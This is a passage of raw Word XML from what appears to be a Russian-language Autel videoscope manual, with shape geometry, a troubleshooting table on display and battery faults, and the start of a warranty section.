                            <a:gd name="T195" fmla="*/ 3336 h 6258"/>
                            <a:gd name="T196" fmla="+- 0 10471 1445"/>
                            <a:gd name="T197" fmla="*/ T196 w 9026"/>
                            <a:gd name="T198" fmla="+- 0 2868 1572"/>
                            <a:gd name="T199" fmla="*/ 2868 h 6258"/>
                            <a:gd name="T200" fmla="+- 0 10471 1445"/>
                            <a:gd name="T201" fmla="*/ T200 w 9026"/>
                            <a:gd name="T202" fmla="+- 0 2316 1572"/>
                            <a:gd name="T203" fmla="*/ 2316 h 6258"/>
                            <a:gd name="T204" fmla="+- 0 7977 1445"/>
                            <a:gd name="T205" fmla="*/ T204 w 9026"/>
                            <a:gd name="T206" fmla="+- 0 1572 1572"/>
                            <a:gd name="T207" fmla="*/ 1572 h 6258"/>
                            <a:gd name="T208" fmla="+- 0 7977 1445"/>
                            <a:gd name="T209" fmla="*/ T208 w 9026"/>
                            <a:gd name="T210" fmla="+- 0 2316 1572"/>
                            <a:gd name="T211" fmla="*/ 2316 h 6258"/>
                            <a:gd name="T212" fmla="+- 0 10471 1445"/>
                            <a:gd name="T213" fmla="*/ T212 w 9026"/>
                            <a:gd name="T214" fmla="+- 0 2040 1572"/>
                            <a:gd name="T215" fmla="*/ 2040 h 6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26" h="6258">
                              <a:moveTo>
                                <a:pt x="4590" y="5045"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="5045"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="5705"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="5705"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="5045"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="4590" y="2995"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2995"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="3463"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="3739"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="4015"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="4291"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="4567"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="4567"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="4291"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="4015"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="3739"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="3463"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="2995"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="4590" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="936"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="936"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4590" y="0"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="6522" y="5789"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4600" y="5789"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="5789"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="6522" y="5045"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4600" y="5045"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="5513"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="5789"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="5789"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="5513"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="5045"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="6522" y="2995"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4600" y="2995"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="3463"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="3931"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="3931"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="3463"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="2995"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="6522" y="1773"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4600" y="1773"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="2242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="2518"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="2518"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="2242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="1773"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="6522" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4600" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="936"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4600" y="1764"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="1764"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="936"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6522" y="0"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="9026" y="5045"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6532" y="5045"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="5705"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="6257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="5705"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="5045"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="9026" y="2995"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6532" y="2995"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="3655"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="5035"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="3655"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="2995"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="9026" y="1773"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6532" y="1773"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="2242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="2710"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="2986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="2710"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="2242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="1773"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="9026" y="744"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6532" y="744"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="1020"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="1296"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="1764"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="1764"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="1296"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="1020"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="744"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="9026" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6532" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6532" y="744"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="744"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9026" y="468"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="90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766B5" id="AutoShape 41" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.25pt;margin-top:78.6pt;width:451.3pt;height:312.9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26,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" path="m4590,5045l,5045r,660l,6257r4590,l4590,5705r,-660m4590,2995l,2995r,468l,3739r,276l,4291r,276l,5035r4590,l4590,4567r,-276l4590,4015r,-276l4590,3463r,-468m4590,l,,,468,,936,,2986r4590,l4590,936r,-468l4590,m6522,5789r-1922,l4600,6257r1922,l6522,5789t,-744l4600,5045r,468l4600,5789r1922,l6522,5513r,-468m6522,2995r-1922,l4600,3463r,468l4600,5035r1922,l6522,3931r,-468l6522,2995t,-1222l4600,1773r,469l4600,2518r,468l6522,2986r,-468l6522,2242r,-469m6522,l4600,r,468l4600,936r,828l6522,1764r,-828l6522,468,6522,m9026,5045r-2494,l6532,5705r,552l9026,6257r,-552l9026,5045t,-2050l6532,2995r,660l6532,5035r2494,l9026,3655r,-660m9026,1773r-2494,l6532,2242r,468l6532,2986r2494,l9026,2710r,-468l9026,1773t,-1029l6532,744r,276l6532,1296r,468l9026,1764r,-468l9026,1020r,-276m9026,l6532,r,468l6532,744r2494,l9026,468,9026,e" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,4201795;0,4971415;2914650,4620895;2914650,2900045;0,3197225;0,3547745;0,3898265;2914650,4195445;2914650,3723005;2914650,3372485;2914650,2900045;0,998220;0,1592580;2914650,2894330;2914650,1295400;4141470,4674235;2921000,4971415;4141470,4674235;2921000,4201795;2921000,4674235;4141470,4498975;4141470,2900045;2921000,3197225;2921000,4195445;4141470,3494405;4141470,2900045;2921000,2124075;2921000,2597150;4141470,2894330;4141470,2421890;4141470,998220;2921000,1295400;2921000,2118360;4141470,1592580;4141470,998220;4147820,4201795;4147820,4971415;5731510,4620895;5731510,2900045;4147820,3319145;5731510,4195445;5731510,2900045;4147820,2124075;4147820,2719070;5731510,2894330;5731510,2421890;5731510,1470660;4147820,1645920;4147820,2118360;5731510,1821180;5731510,1470660;4147820,998220;4147820,1470660;5731510,1295400" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="80" w:name="_bookmark26"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00C86290">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Устранение</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00C86290">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00C86290">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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1278"/>
        <w:gridCol w:w="1146"/>
        <w:gridCol w:w="642"/>
        <w:gridCol w:w="1531"/>
        <w:gridCol w:w="2234"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="749"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4597" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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ПРИЗНАКИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2234"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ВОЗМОЖНЫЕ ПРИЧИНЫ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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МЕРЫ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2668F" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1765"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1278" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:right w:val="nil"/>
            </w:tcBorders>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 xml:space="preserve">Дисплей </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>отсутству</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>е</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>т.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1146" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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включен,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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но</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1531" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
            </w:tcBorders>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изображение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2234"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Ослабло</w:t>
            </w:r>
          </w:p>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соединение зонда.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="924"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="1823"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Проверьте соединение и</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>в</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>случае необходимости</w:t>
            </w:r>
          </w:p>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подсоедините зонд повторно.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2668F" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1212"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1278" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:ind w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1146" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:ind w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:ind w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1531" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:ind w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2234"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Поверхность видеоголовки загрязнена.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="1223"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Очистите</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
              <w:t>поверхность видеоголовки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="2039"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4597" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Светодиод на видеоголовке светится тусклым светом при выборе максимальной яркости, кроме того, изображения на дисплее становятся монохромными, а сам дисплей отключается через короткий промежуток времени.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="1376"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Низкий</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
              <w:t>заряд батареек.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Замените батарейки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1211"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4597" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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Видеоскоп не включается.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2234"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Батарейки полностью разряжены.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Замените батарейки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="81" w:name="_bookmark27"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сведения о гарантийных</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обязательствах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_bookmark28"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Годичная ограниченная</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гарантия</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Компания </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Autel</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
